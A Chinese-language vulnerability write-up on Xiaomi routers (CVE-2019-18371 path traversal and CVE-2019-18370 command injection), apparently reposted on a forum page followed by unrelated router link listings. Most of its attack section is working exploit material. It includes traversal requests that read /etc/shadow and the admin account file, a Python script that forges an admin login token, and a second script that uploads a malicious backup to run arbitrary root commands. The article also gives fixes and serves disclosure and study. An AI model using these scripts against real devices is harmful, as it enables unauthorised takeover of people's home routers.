小米路由器任意文件讀取及遠(yuǎn)程命令執(zhí)行漏洞解析

一、漏洞描述

小米路由器是一款高配的智能路由器,具備強(qiáng)大的擴(kuò)展,并且具備高速傳輸?shù)奶攸c(diǎn),其傳輸速度最高可以達(dá)到866M,相比普通150M/300M的普通無(wú)線路由器具備更高無(wú)線傳輸速率。小米路由器系統(tǒng)存在任意文件讀取漏洞和遠(yuǎn)程命令執(zhí)行漏洞，攻擊者通過該漏洞可以獲取服務(wù)器權(quán)限，導(dǎo)致服務(wù)器失陷。

二、漏洞復(fù)現(xiàn)

系統(tǒng)首頁(yè)地址及頁(yè)面顯示如下

?http://xx.xx.xx.xx/cgi-bin/luci/web

1、遠(yuǎn)程任意文件讀取漏洞（CVE-2019-18371）

小米路由器的nginx配置文件錯(cuò)誤，導(dǎo)致目錄穿越漏洞，實(shí)現(xiàn)任意文件讀?。o(wú)需登錄）

nginx配置不當(dāng)可導(dǎo)致目錄穿越漏洞，

location /xxx {
  alias /abc/;
}

可通過訪問http://domain.cn/xxx../etc/passwd實(shí)現(xiàn)目錄穿越訪問上級(jí)目錄及其子目錄文件。

在小米路由器的文件/etc/sysapihttpd/sysapihttpd.conf中，存在

location /api-third-party/download/extdisks {
  alias /extdisks/;
}

故可以任意文件讀取根目錄下的所有文件，而且是root權(quán)限，如訪問http://xx.xx.xx.xx/api-third-party/download/extdisks../etc/shadow

類似的問題，存在多處如

location /backup/log {
  alias /tmp/syslogbackup/;
}


location /api-third-party/download/public {
  alias /userdisk/data/;
}
location /api-third-party/download/private {
  alias /userdisk/appdata/;
}

通過任意文件讀取，登錄路由器后臺(tái)

不是明文存儲(chǔ)密碼，需要進(jìn)行一定分析。關(guān)注兩個(gè)過程，一是登錄時(shí)前端js生成http post請(qǐng)求參數(shù)過程，二是驗(yàn)證用戶登陸的后端過程。

登錄時(shí)前端js生成http post請(qǐng)求參數(shù)過程

var Encrypt = {
    key: 'a2ffa5c9be07488bbb04a3a47d3c5f6a',
    iv: '64175472480004614961023454661220',
    nonce: null,
    init: function(){
        var nonce = this.nonceCreat();
        this.nonce = nonce;
        return this.nonce;
    },
    nonceCreat: function(){
        var type = 0;
        // 自己的mac地址
        var deviceId = '<%=mac%>';
        var time = Math.floor(new Date().getTime() / 1000);
        var random = Math.floor(Math.random() * 10000);
        return [type, deviceId, time, random].join('_');
    },
    oldPwd : function(pwd){ // oldPwd = sha1(nonce + sha1(pwd + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))
        return CryptoJS.SHA1(this.nonce + CryptoJS.SHA1(pwd + this.key).toString()).toString();
    },
  //...
};

可知oldPwd = sha1(nonce + sha1(pwd + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))，登陸請(qǐng)求包為

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: xx.xx.xx.xx


username=admin&password=c9e62da7b8a0b7a4918c5a90912ba81a9717f9ab&logtype=2&nonce=0_mac地址_時(shí)間戳_5248

驗(yàn)證用戶登陸的后端過程

調(diào)用XQSecureUtil.checkUser函數(shù)

function checkUser(user, nonce, encStr)
    -- 從xiaoqiang 配置文件中讀取信息
    local password = XQPreference.get(user, nil, "account")
    if password and not XQFunction.isStrNil(encStr) and not XQFunction.isStrNil(nonce) then
        if XQCryptoUtil.sha1(nonce..password) == encStr then
            return true
        end
    end
    XQLog.log(4, (luci.http.getenv("REMOTE_ADDR") or "").." Authentication failed", nonce, password, encStr)
    return false
end

跟進(jìn)XQPreference.get函數(shù)可以知道是從/etc/config/account文件中讀取某個(gè)字符串，這里稱它為accountStr。

checkUser函數(shù)判斷等式為(encStr為參數(shù)oldPwd)

sha1(nonce + sha1(密碼 + 'a2ffa5c9be07488bbb04a3a47d3c5f6a'))
==
sha1(nonce + accountStr)

則

accountStr == sha1(密碼 + 'a2ffa5c9be07488bbb04a3a47d3c5f6a')

故，只需要讀取/etc/config/account得到accountStr即可構(gòu)造如下數(shù)據(jù)包登陸

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: xx.xx.xx.xx


username=admin&password=sha1(nonce + account中保存的字符串)&logtype=2&nonce=0_mac地址_時(shí)間戳_5248

先執(zhí)行任意文件讀取POC，讀取etc/shadow文件，驗(yàn)證漏洞的存在，在響應(yīng)中將會(huì)得到回顯

GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Connection: close

然后讀取/etc/config/account得到accountStr即可構(gòu)造數(shù)據(jù)包登陸

實(shí)現(xiàn)任意登陸POC如下

arbitrary_file_read_vulnerability.py

#!/usr/bin/python


import os
import re
import time
import base64
import random
import hashlib
import requests
from Crypto.Cipher import AES


proxies = {"http":"http://127.0.0.1:8080"}




def get_mac():
  ## get mac
  r0 = requests.get("http://xx.xx.xx.xx/cgi-bin/luci/web",proxies = proxies)
  mac = re.findall(r'deviceId = '(.*?)'', r0.text)[0]
  # print(mac)  
  return mac


def get_account_str():
  ## read /etc/config/account
  r1 = requests.get("http://xx.xx.xx.xx/api-third-party/download/extdisks../etc/config/account",proxies = proxies)
  print(r1.text)
  account_str = re.findall(r'admin'? '(.*)'', r1.text)[0]
  return account_str


def create_nonce(mac):
  type_ = 0
  deviceId = mac
  time_ = int(time.time())
  rand = random.randint(0,10000)
  return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)


def calc_password(nonce, account_str):
  m = hashlib.sha1()
  m.update((nonce + account_str).encode('utf-8'))
  return m.hexdigest()


mac = get_mac()
account_str = get_account_str()
## login, get stok
nonce = create_nonce(mac)
password = calc_password(nonce, account_str)
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
r2 = requests.post("http://xx.xx.xx.xx/cgi-bin/luci/api/xqsystem/login", 
  data = data, 
  headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"},proxies = proxies)
# print(r2.text)
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]
print("stok="+stok)

可以獲取到登錄的stok。

2、遠(yuǎn)程命令執(zhí)行漏洞（root權(quán)限）（CVE-2019-18370）

備份文件是tar.gz格式的，上傳后tar zxf解壓，所以構(gòu)造備份文件，可以控制解壓目錄的文件內(nèi)容，結(jié)合測(cè)試上傳下載速度功能的sh腳本執(zhí)行時(shí)讀取測(cè)試url列表文件，并將url部分直接進(jìn)行命令拼接執(zhí)行。

備份文件解壓導(dǎo)致/tmp/目錄任意文件可控

在/usr/lib/lua/luci/controller/api/misystem.lua中，配置文件功能如下

function cUpload()
    local LuciFs = require("luci.fs")
    local XQBackup = require("xiaoqiang.module.XQBackup")
    local code = 0
    local canupload = true
    local uploadFilepath = "/tmp/cfgbackup.tar.gz"
    local fileSize = tonumber(LuciHttp.getenv("CONTENT_LENGTH"))
    if fileSize > 102400 then
        canupload = false
    end
    LuciHttp.setfilehandler(
        function(meta, chunk, eof)
            if canupload then
                if not fp then
                    if meta and meta.name == "image" then
                        fp = io.open(uploadFilepath, "w")
                    end
                end
                if chunk then
                    fp:write(chunk)
                end
                if eof then
                    fp:close()
                end
            else
                code = 1630
            end
        end
    )
    if LuciHttp.formvalue("image") and fp then
        code = 0
    end
    local result = {}
    if code == 0 then
        local ext = XQBackup.extract(uploadFilepath)
        if ext == 0 then
            result["des"] = XQBackup.getdes()
        else
            code = 1629
        end
    end
    if code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(code)
        LuciFs.unlink(uploadFilepath)
    end
    result["code"] = code
    LuciHttp.write_json(result)
end

其中調(diào)用XQBackup.extract(uploadFilepath)進(jìn)行解壓

-- 0:succeed
-- 1:file does not exist
-- 2:no description file
-- 3:no mbu file
function extract(filepath)
    local fs = require("nixio.fs")
    local tarpath = filepath
    if not tarpath then
        tarpath = TARMBUFILE
    end
    if not fs.access(tarpath) then
        return 1
    end
    os.execute("cd /tmp; tar -xzf "..tarpath.." >/dev/null 2>/dev/null")
    os.execute("rm "..tarpath.." >/dev/null 2>/dev/null")
    if not fs.access(DESFILE) then
        return 2
    end
    if not fs.access(MBUFILE) then
        return 3
    end
    return 0
end

可知，/tmp目錄下的任意文件可控

/usr/bin/upload_speedtest,/usr/bin/download_speedtest等會(huì)讀取/tmp/speedtest_urls.xml并提取url直接進(jìn)行命令拼接，且這幾個(gè)腳本可以通過web接口調(diào)用

舉例，查看/usr/bin/download_speedtest文件

#!/usr/bin/env lua
-- ...
local cfg = {
-- ...
  ['xmlfile'] = "/usr/share/speedtest.xml",
        ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}
VERSION="__UNDEFINED__"
-- ...
-- 測(cè)試網(wǎng)速使用的url文件為，若存在/tmp/speedtest_urls.xml則使用，否則用/usr/share/speedtest.xml
local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
    filexml:close()
    filename = cfg.tmp_speedtest_xml
else
    filename = cfg.xmlfile
end


local pp = io.open(filename)
local line = pp:read("*line")
local size = 0
local resources = {}
local u = ""
local pids = {}
-- ...
function wget_work(url)
  local _url = url
  pid = posix.fork()
  if pid < 0 then
    print("fork error")
    return -1
  elseif pid > 0 then
    --print(string.format("child pid %d
", pid))
  else
        -- 拼接命令，最終在這里執(zhí)行
    os.execute('for i in $(seq '.. math.floor(cfg.nr/cfg.nc) ..'); do wget '.. url  ..
    " -q -O /dev/null; done")
  end
  return pid
end


while line do
    -- 從文件中提取url， 這里提取沒有進(jìn)行過濾
  local _, _, url = string.find(line,'')
  if url then
    table.insert(resources, url)
  end
  line = pp:read("*line")
end
pp:close()


local urls = mrandom(1, table.getn(resources), cfg.nc)


for k, v in ipairs(urls) do
  if VERSION == "LESSMEM" then
    local pid = wget_work_loop(resources[v])
  else
        -- VERSION 為 __UNDEFINED__， url直接作為參數(shù)
    local pid = wget_work(resources[v])
  end
  if(pid == 0) then
    os.exit(0)
  elseif(pid == -1) then
    done()
  end
end

調(diào)用的地方貌似有好幾個(gè)，其中/usr/lib/lua/luci/controller/api/xqnetdetect.lua中

function netspeed()
    local XQPreference = require("xiaoqiang.XQPreference")
    local XQNSTUtil = require("xiaoqiang.module.XQNetworkSpeedTest")
    local code = 0
    local result = {}
    local history = LuciHttp.formvalue("history")
    if history then
        result["bandwidth"] = tonumber(XQPreference.get("BANDWIDTH", 0, "xiaoqiang"))
        result["download"] = tonumber(string.format("%.2f", 128 * result.bandwidth))
        result["bandwidth2"] = tonumber(XQPreference.get("BANDWIDTH2", 0, "xiaoqiang"))
        result["upload"] = tonumber(string.format("%.2f", 128 * result.bandwidth2))
    else
        os.execute("/etc/init.d/miqos stop")
        -- 這里調(diào)用了downloadSpeedTest
        local download = XQNSTUtil.downloadSpeedTest()
        if download then
            result["download"] = download
            result["bandwidth"] = tonumber(string.format("%.2f", 8 * download/1024))
            XQPreference.set("BANDWIDTH", tostring(result.bandwidth), "xiaoqiang")
        else
            code = 1588
        end
        if code ~= 0 then
           result["msg"] = XQErrorUtil.getErrorMessage(code)
        end
        os.execute("/etc/init.d/miqos start")
    end
    
    result["code"] = code
    LuciHttp.write_json(result)
end
function downloadSpeedTest()
    local speedtest = "/usr/bin/download_speedtest"
    local speed
    -- 直接調(diào)用sh文件
    for _, line in ipairs(LuciUtil.execl(speedtest)) do
        if not XQFunction.isStrNil(line) and line:match("^avg rx:") then
            speed = line:match("^avg rx:(%S+)")
            if speed then
                speed = tonumber(string.format("%.2f",speed/8))
            end
            break
        end
    end
    return speed
end

所以，我們只需要構(gòu)造惡意的speedtest_urls.xml文件，構(gòu)造備份文件，上傳備份文件，然后調(diào)用網(wǎng)絡(luò)測(cè)試相關(guān)的接口，即可以實(shí)現(xiàn)命令注入。

實(shí)現(xiàn)命令執(zhí)行POC

template.xml文件

remote_command_execution_vulnerability.py

#!/usr/bin/python




import os
import tarfile
import requests


proxies = {"http":"http://127.0.0.1:8080"}




## get stok
stok = input("stok: ")


## make config file
command = input("command: ")
speed_test_filename = "speedtest_urls.xml"
with open("template.xml","rt",encoding='gb18030', errors='ignore') as f:
  template = f.read()
data = template.format(command=command)
# print(data)
with open("speedtest_urls.xml",'wt') as f:
  f.write(data)


with tarfile.open("payload.tar.gz", "w:gz") as tar:
  # tar.add("cfg_backup.des")
  # tar.add("cfg_backup.mbu")
  tar.add("speedtest_urls.xml")


## upload config file
print("start uploading config file ...")
r1 = requests.post("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(stok), files={"image":open("payload.tar.gz",'rb')}, proxies=proxies)
# print(r1.text)


## exec download speed test, exec command
print("start exec command...")
r2 = requests.get("http://xx.xx.xx.xx/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(stok), proxies=proxies)
# print(r2.text)


## read result file
r3 = requests.get("http://xx.xx.xx.xx/api-third-party/download/extdisks../tmp/1.txt", proxies=proxies)
if r3.status_code == 200:
  print("success, vul")
  print(r3.text)

結(jié)合二者，無(wú)需登錄即可遠(yuǎn)程命令執(zhí)行

經(jīng)測(cè)試，在小米系列路由器中存在該漏洞，如小米路由器R3G、小米路由器R3A、小米路由器R4等

三、修復(fù)方案

1、任意文件讀取

將/etc/sysapihttpd/sysapihttpd.conf中的形如以下形式修改為

location /xxx {
  alias /abc/;
}

修改為

location /xxx/ {
  alias /abc/;
}

2、遠(yuǎn)程命令執(zhí)行

將備份文件格式修改為特定格式，直接讀取備份文件內(nèi)容，而不需使用解壓

從speedtest_urls.xml中讀取url時(shí)，進(jìn)行必要的過濾，防止命令注入

文章作者守衛(wèi)者安全，在此特別鳴謝。

聲明?? 安全技術(shù)類文章僅供參考，此文所提供的信息僅針對(duì)漏洞靶場(chǎng)進(jìn)行滲透，未經(jīng)授權(quán)請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試，如因此產(chǎn)生的一切不良后果與文章作者和本公眾號(hào)無(wú)關(guān)。?本文所提供的工具僅用于學(xué)習(xí)，禁止用于其他目的，推薦大家在了解技術(shù)原理的前提下，更好的維護(hù)個(gè)人信息安全、企業(yè)安全、國(guó)家安全。

閱讀全文

信息安全(38665) 信息安全(38665)
路由器(111203) 路由器(111203)
小米路由器(9651) 小米路由器(9651)

評(píng)論

相關(guān)推薦

4G工業(yè)路由器與普通路由器區(qū)別深度解析

`　　4G工業(yè)路由器與普通路由器區(qū)別深度解析　　4G工業(yè)路由器可幫助用戶快速接入高速互聯(lián)網(wǎng)，實(shí)現(xiàn)安全可靠的數(shù)據(jù)傳輸，廣泛應(yīng)用于交通、電力、金融、水利、氣象、環(huán)保、工業(yè)自動(dòng)化，能源礦產(chǎn)、醫(yī)療、農(nóng)業(yè)

2018-03-15 16:51:38

4G工業(yè)級(jí)無(wú)線路由器

4G LTE網(wǎng)絡(luò)達(dá)到數(shù)據(jù)遠(yuǎn)程無(wú)線傳輸功能的工業(yè)級(jí)戶外高速無(wú)線上網(wǎng)終端?！　?G路由器采用高性能的工業(yè)級(jí)處理器，內(nèi)置嵌入式實(shí)時(shí)操作系統(tǒng)與4G模塊通信，采用串口、以太網(wǎng)LAN、以太網(wǎng)WAN、Wi-Fi作為

2018-03-02 14:43:16

解析路由器的工作原理

本地路由器和遠(yuǎn)程路由器，本地路由器是用來(lái)連接網(wǎng)絡(luò)傳輸介質(zhì)的，如光纖、同軸電纜、雙絞線;遠(yuǎn)程路由器是用來(lái)連接遠(yuǎn)程傳輸介質(zhì)，并要求相應(yīng)的設(shè)備，如電話線要配調(diào)制解調(diào)器，無(wú)線要通過無(wú)線接收機(jī)、發(fā)射機(jī)。一般說來(lái)

2018-01-28 13:04:21

路由器分類

路由器分類概述當(dāng)前路由器分類方法各異，一般來(lái)說可以按照交換能力、系統(tǒng)結(jié)構(gòu)、在網(wǎng)絡(luò)中的位置、設(shè)備功能以及接口性能等劃分。各種分類方法有一定的關(guān)聯(lián)，但是并不完全一致。上面提到的各種分類原則如下所述

2017-06-15 10:09:31

路由器參數(shù)設(shè)置和功能詳解

路由器參數(shù)設(shè)置和功能詳解路由器是整個(gè)網(wǎng)絡(luò)與外界的通信出口,也是聯(lián)系內(nèi)部子網(wǎng)的橋梁。在網(wǎng)絡(luò)組建的過程中，路由器的選購(gòu)是極為重要的。在所有網(wǎng)絡(luò)設(shè)備中，路由器的價(jià)格也是相當(dāng)?shù)陌嘿F，是網(wǎng)絡(luò)設(shè)備的重頭戲

2008-06-02 11:59:05

路由器固件的解包與打包

為：1.先用解包軟件解包路由器固件將會(huì)得到固件核心文件。2.再把Client復(fù)制到固件的某個(gè)文件夾內(nèi)，且注意賦予可執(zhí)行的權(quán)限。3.用build-ng.sh進(jìn)行最終的封包，生成新的固件。操作環(huán)境

2016-01-04 08:53:33

路由器基礎(chǔ)知識(shí)問答篇

比特是"1"，表明地址中該位比特不用管，如果是"0"的話，表明地址中該位比特將被用來(lái)進(jìn)行匹配?？梢允褂猛ㄅ浞?。以下是一個(gè)路由器配置文件中的訪問表例子

2009-05-24 23:51:25

路由器基礎(chǔ)知識(shí)問答（一）

的后面進(jìn)行討論。）　　2、什么是訪問表？　　訪問表是管理者加入的一系列控制數(shù)據(jù)包在路由器中輸入、輸出的規(guī)則。它不是由路由器自己產(chǎn)生的。訪問表能夠允許或禁止數(shù)據(jù)包進(jìn)入或輸出到目的地。訪問表的表項(xiàng)是順序執(zhí)行

2012-11-12 21:09:56

路由器基礎(chǔ)知識(shí)問答（三）

適當(dāng)參數(shù)的NO OFFSET- LIST命令可以清除這個(gè)偏移量。　　在以下的例子中，一個(gè)使用IGRP的路由器在所有輸出度量值的時(shí)延上加上偏移量10： offset-list out 10下面是一個(gè)將相

2012-11-12 21:12:14

路由器基礎(chǔ)知識(shí)問答（二）

[process-id] [metric metric - value ] [metric-type type - value ] [subnets]在這個(gè)命令中：◎protocol：指明路由器要進(jìn)行路由再分配的源

2012-11-12 21:10:58

路由器方案板香橙派R1 Plus如何使用SSH遠(yuǎn)程登錄

，并且允許 root 用戶登錄系統(tǒng)。ssh 登錄前首先需要確保以太網(wǎng)已連接，然后使用 ifconfig 命令或者通過查看路由器的方式獲取開發(fā)板的 IP 地址。1. Ubuntu 下 SSH 遠(yuǎn)程登錄

2021-05-11 18:07:37

路由器測(cè)試的類型和方法

適用范圍，只列出路由器測(cè)試中相當(dāng)常到的遠(yuǎn)端測(cè)試法。其中，控制觀察點(diǎn)（PCO）：通常由兩個(gè)先入先出（FIFO）隊(duì)列組成，其功能類似于一對(duì)輸入輸出端口，向隊(duì)列一端發(fā)送命令，從同一隊(duì)列的另一端接收應(yīng)答信號(hào)

2018-12-12 18:32:28

路由器的種類

路由器的種類:路由器分類路由器是分類的，不是這樣分的，一般來(lái)說可以分為家用寬帶路由器、企業(yè)級(jí)路由器及電信級(jí)路由器。當(dāng)然不同的路由器其功能、性能及價(jià)格等差異巨大。路由器的種類:路由器的種類1、功能上

2022-03-17 12:16:32

路由器的配置

顯示。二、路由器的基本配置命令111.顯示VRP軟件版本以及路由器硬件版本在任何模式下均可顯示VRP軟件版本和路由器硬件版本，如在普通用戶模式下執(zhí)行show version命令即可2. 設(shè)置密碼

2008-12-07 14:09:51

DeviceType協(xié)調(diào)器和路由器之間有什么區(qū)別？

Control Bridge 路由器用作路由器，但也能夠發(fā)送串行命令。所以我的主 MCU 可以通過串行端口向控制橋路由器發(fā)送一個(gè)燈開/關(guān)命令，控制橋路由器將通過 Zigbee 發(fā)送該命令。它可以實(shí)現(xiàn)嗎？

2023-03-20 08:01:29

IPv6路由器的優(yōu)點(diǎn)

發(fā)現(xiàn)　　　鄰居發(fā)現(xiàn)提供以下一些功能：　　路由器發(fā)現(xiàn)。這允許主機(jī)標(biāo)識(shí)本地路由器。地址解析。這允許節(jié)點(diǎn)為相應(yīng)的下一躍點(diǎn)地址解析鏈路層地址（替代地址解析協(xié)議 [ARP]）。H3C IPv6網(wǎng)解決方案地址

2011-01-25 17:25:36

Zigbee的協(xié)調(diào)器、路由器、終端的概念

的最高權(quán)限，是整個(gè)網(wǎng)絡(luò)的維護(hù)者，還可以保持間接尋址用的表格綁定，同時(shí)還可以設(shè)計(jì)安全中心和執(zhí)行其他動(dòng)作，保持網(wǎng)絡(luò)其他設(shè)備的通信。路由器：（router）路由器是一種支持關(guān)聯(lián)的設(shè)備，能夠?qū)崿F(xiàn)其他節(jié)點(diǎn)的消息轉(zhuǎn)發(fā)

2018-08-10 06:01:28

[分享]捷希智能無(wú)線路由915 ，300M高速數(shù)顯路由器

WEP加密，支持WPA、802.1X等高級(jí)加密及安全機(jī)制。同時(shí)具有QSS快速安全設(shè)置，能夠讓用戶輕松設(shè)置無(wú)線安全。通過web界面的設(shè)置向?qū)?，用戶可以輕松快捷地配置路由器，同時(shí)具有遠(yuǎn)程Web管理功能

2010-05-17 23:43:11

[分享]捷希智能顯屏路由器915，300M高速數(shù)顯路由器

WEP加密，支持WPA、802.1X等高級(jí)加密及安全機(jī)制。同時(shí)具有QSS快速安全設(shè)置，能夠讓用戶輕松設(shè)置無(wú)線安全。通過web界面的設(shè)置向?qū)В脩艨梢暂p松快捷地配置路由器，同時(shí)具有遠(yuǎn)程Web管理功能，用戶

2010-05-18 19:39:37

ip地址是怎樣通過nmcli命令直接連接wifi路由器的呢

ip地址是怎樣通過nmcli命令直接連接wifi路由器的呢？有哪些步驟？

2022-02-11 09:22:51

zigbee 路由器控制數(shù)據(jù)沒有被接收執(zhí)行？

zigbee 路由器控制數(shù)據(jù)沒有被接收執(zhí)行？zigbee我在用協(xié)調(diào)器發(fā)送一些控制命令控制路由設(shè)備，發(fā)現(xiàn)其中一臺(tái)路由器上的開關(guān)未被控制到，抓包時(shí)發(fā)現(xiàn)：該控制數(shù)據(jù)幀并未被捕捉，可是transID有增加

2016-03-31 11:52:00

【Aworks280試用體驗(yàn)】Eclipse與Aworks280的遠(yuǎn)程調(diào)試

/arm-fsl-linux-gnueabi/debug-root/usr/bin其中有g(shù)dbserver這個(gè)命令找到文件路徑了還需要把它拷到系統(tǒng)里面既然是遠(yuǎn)程調(diào)試就以路由器來(lái)測(cè)試一下首先在/etc/rc.d

2015-12-10 17:06:58

【NetRouter試用體驗(yàn)】二、網(wǎng)絡(luò)接入與路由器功能測(cè)試

Connent2Ap（為什么是Connet不是Connect......處女座情結(jié)泛濫了- -）使NetRouter連接到指定路由器，命令行返回“please reboot”后輸入reboot指令是系統(tǒng)重啟。重啟

2016-02-29 23:19:44

買工業(yè)路由器看什么參數(shù)

接入十分重要。 7、協(xié)議支持，多協(xié)議支持，保障數(shù)據(jù)無(wú)損傳輸。 8、Flash、ram大小，路由器的flash相當(dāng)于PC的硬盤，放的是路由器的軟件，路由器的ram相當(dāng)于PC的內(nèi)存，是執(zhí)行軟件的地方，如果內(nèi)存不夠大，用起來(lái)可能會(huì)覺得卡，會(huì)死機(jī)，就是路由器不穩(wěn)定。工業(yè)路由器：`

2020-10-22 17:53:38

交換機(jī)和路由器

； 4.執(zhí)行或不執(zhí)行路由處理。第三層交換機(jī)與傳統(tǒng)路由器相比有如下優(yōu)點(diǎn)： 1.子網(wǎng)間傳輸帶寬可任意分配：傳統(tǒng)路由器每個(gè)接口連接一個(gè)子網(wǎng)，子網(wǎng)通過路由器進(jìn)行傳輸?shù)乃俾时唤涌诘膸捤拗啤６龑咏粨Q機(jī)則不

2009-01-08 17:42:19

什么是4G工業(yè)路由器？4G工業(yè)路由器的應(yīng)用有哪些？

什么是4G工業(yè)路由器？如何利用路由器遠(yuǎn)程運(yùn)維？工業(yè)路由器都有些什么功能？這些問題我們平時(shí)在使用路由器或項(xiàng)目中都可能會(huì)遇到。我們使用的比較多的就是家用路由器與企業(yè)路由器。通俗來(lái)講，家用路由器基本上只有

2020-01-27 16:28:12

優(yōu)酷路由器L1一周上手測(cè)評(píng)

酷土豆路由寶銘牌標(biāo)識(shí)，和白色S/N碼和MAC地址貼紙，路由器左側(cè)為一個(gè)USB2.0接口，支持局域網(wǎng)內(nèi)文件讀取和給電子產(chǎn)品充電，親測(cè)手機(jī)和ipad可用。從側(cè)面看路由器上部整體呈一弧面，四角非常圓潤(rùn)

2016-09-18 21:42:42

低端路由器和高端路由的區(qū)別

   最近看到有網(wǎng)友在論壇上提問：“低端路由器和高端路由器都是差不多的用法，為什么價(jià)格會(huì)相差這么遠(yuǎn)??？”其實(shí)這個(gè)問題提得很不錯(cuò)，不少不熟悉產(chǎn)品技術(shù)的朋友基本上都會(huì)

2010-06-26 14:11:29

剛買了花生棒回去準(zhǔn)備搭建小米遠(yuǎn)程結(jié)果

`今天剛買了個(gè)花生棒回去看著教程準(zhǔn)備自己配合小米路由器搭建遠(yuǎn)程服務(wù)結(jié)果怎么弄都弄不好快絕望了。有沒有高手指點(diǎn)下我應(yīng)該怎么設(shè)置？怎么弄？`

2014-12-26 15:41:46

刪除任意文件（包括正在運(yùn)行的）綠色版

刪除任意文件（包括正在運(yùn)行的）綠色版

2009-05-14 11:42:09

華為路由器配置教程

華為路由器配置教程,手冊(cè)大全一系統(tǒng)基本命令：主要介紹命令行接口相關(guān)命令、配置文件管理命令、基本的系統(tǒng)管理命令、網(wǎng)絡(luò)測(cè)試工具命令、系統(tǒng)調(diào)試命令、SNMP配置命令、日志配置命令和終端服務(wù)命令。二

2009-05-25 01:07:46

華為和思科路由器的互聯(lián)配置

蠶食思科的市場(chǎng)分額。隨著華為路由器在企業(yè)中的應(yīng)用越來(lái)越多，實(shí)現(xiàn)華為路由器和思科路由器的互連，保護(hù)舊有的投資，對(duì)使用者具有重大的實(shí)用意義?！　∪A為路由器命令行接口配置界面在經(jīng)過和思科的官司后做了較大的修改

2009-05-25 00:24:36

基于ARM Cortex-A9架構(gòu)小米路由硬件配置如何，拆解達(dá)人來(lái)支招

雙方意圖構(gòu)建完整云到端生態(tài)系統(tǒng)的戰(zhàn)略現(xiàn)如今路由器領(lǐng)域也正悄悄上演一場(chǎng)變革，路由器就像手機(jī)一樣正從“功能型”向“智能型”過渡。就在3月7日，小米路由器開啟第三輪終極公測(cè)，聯(lián)合迅雷發(fā)放1元公測(cè)資格，還送

2014-03-10 12:09:35

基于無(wú)線傳感技術(shù)的網(wǎng)絡(luò)路由器端口設(shè)計(jì)

另一機(jī)器，依據(jù)轉(zhuǎn)發(fā)方式的不同，有多種應(yīng)用場(chǎng)景。如以下所有的命令都是用SSH 客戶端執(zhí)行的。執(zhí)行命令的計(jì)算機(jī)下面稱為本地計(jì)算機(jī)。而遠(yuǎn)程服務(wù)器則是運(yùn)行著SSH服務(wù)器的機(jī)器，遠(yuǎn)程機(jī)器能訪問某個(gè)端口，但本地

2018-11-07 15:46:34

如何排除路由器故障

如何排除路由器故障路由器是網(wǎng)絡(luò)中進(jìn)行網(wǎng)間連接的關(guān)鍵設(shè)備。作為不同網(wǎng)絡(luò)之間互相連接的樞紐，路由器系統(tǒng)構(gòu)成了基于TCP/IP的Internet的主體脈絡(luò)，也可以說，路由器是整個(gè)網(wǎng)絡(luò)構(gòu)架的“樞紐”。隨著

2009-11-13 21:16:15

工業(yè)路由器的路由環(huán)路

在工業(yè)路由器網(wǎng)絡(luò)中，并不是所有傳輸是通暢無(wú)阻的，會(huì)產(chǎn)生路由重分布、路由環(huán)路等等現(xiàn)象。當(dāng)數(shù)據(jù)報(bào)在一系列路由器之間不斷循環(huán)或往返傳輸卻始終無(wú)法到達(dá)其預(yù)期目標(biāo)網(wǎng)絡(luò)的一種現(xiàn)象，稱之為路由環(huán)路。當(dāng)兩臺(tái)或多臺(tái)

2013-10-22 09:43:10

巧妙解決路由器網(wǎng)絡(luò)分層問題

七層模型從物理層開始向上進(jìn)行。首先檢查物理層，然后檢查數(shù)據(jù)鏈路層，以此類推，設(shè)法確定通信失敗的故障點(diǎn)，直到系統(tǒng)通信正常為止。網(wǎng)絡(luò)診斷可以使用多種工具：路由器診斷命令，網(wǎng)絡(luò)管理工具和包括局域網(wǎng)或廣域網(wǎng)

2018-12-10 10:17:11

教你把廢棄的U盤用作強(qiáng)大路由器

：　　DD-WRT X86版的“dd-wrt-public-vga.image(硬盤/存儲(chǔ)卡安裝鏡像文件)”和“physdiskwrite 0.5.1(路由器IMG寫盤工具)”，并解壓到同一文件夾中，打開CMD

2012-02-02 16:02:16

讓小米路由官方DDNS功能也支持二級(jí)路由

在小米路由器固件中雖然有官方DDNS功能，但是它不支持小米路由作為二級(jí)路由時(shí)使用DDNS。使用小米路由器作為二級(jí)路由而又想使用官方DDNS功能的同學(xué)們有福了，下面的教程教大家實(shí)現(xiàn)。默認(rèn)官方DDNS

2016-05-17 13:45:43

請(qǐng)問小米小蟻攝像機(jī)遠(yuǎn)程視頻傳輸原理是什么？

連接正常，你可以在辦公室用手機(jī)APP來(lái)觀察家里的動(dòng)靜。開箱介紹中有說，攝像頭可以將錄像存儲(chǔ)在小米路由器的硬盤中，但這個(gè)和手機(jī)APP遠(yuǎn)程監(jiān)控應(yīng)該也沒有直接關(guān)系。我的問題是，某人在辦公室用手機(jī)連網(wǎng)并打開小米

2019-07-09 04:35:30

請(qǐng)問路由器設(shè)備自動(dòng)入網(wǎng)怎么解決？

() 命令將路由器刪除，可以看見回復(fù)正確刪除，但是很快就看見路由器自動(dòng)重新加入網(wǎng)絡(luò)，網(wǎng)絡(luò)地址是新分配的網(wǎng)絡(luò)地址。請(qǐng)問，不是協(xié)調(diào)器啟動(dòng)網(wǎng)絡(luò)后一段時(shí)間就禁止設(shè)備入網(wǎng)了嗎？如果需要設(shè)備入網(wǎng)應(yīng)該通過協(xié)調(diào)器發(fā)送

2018-08-18 06:35:53

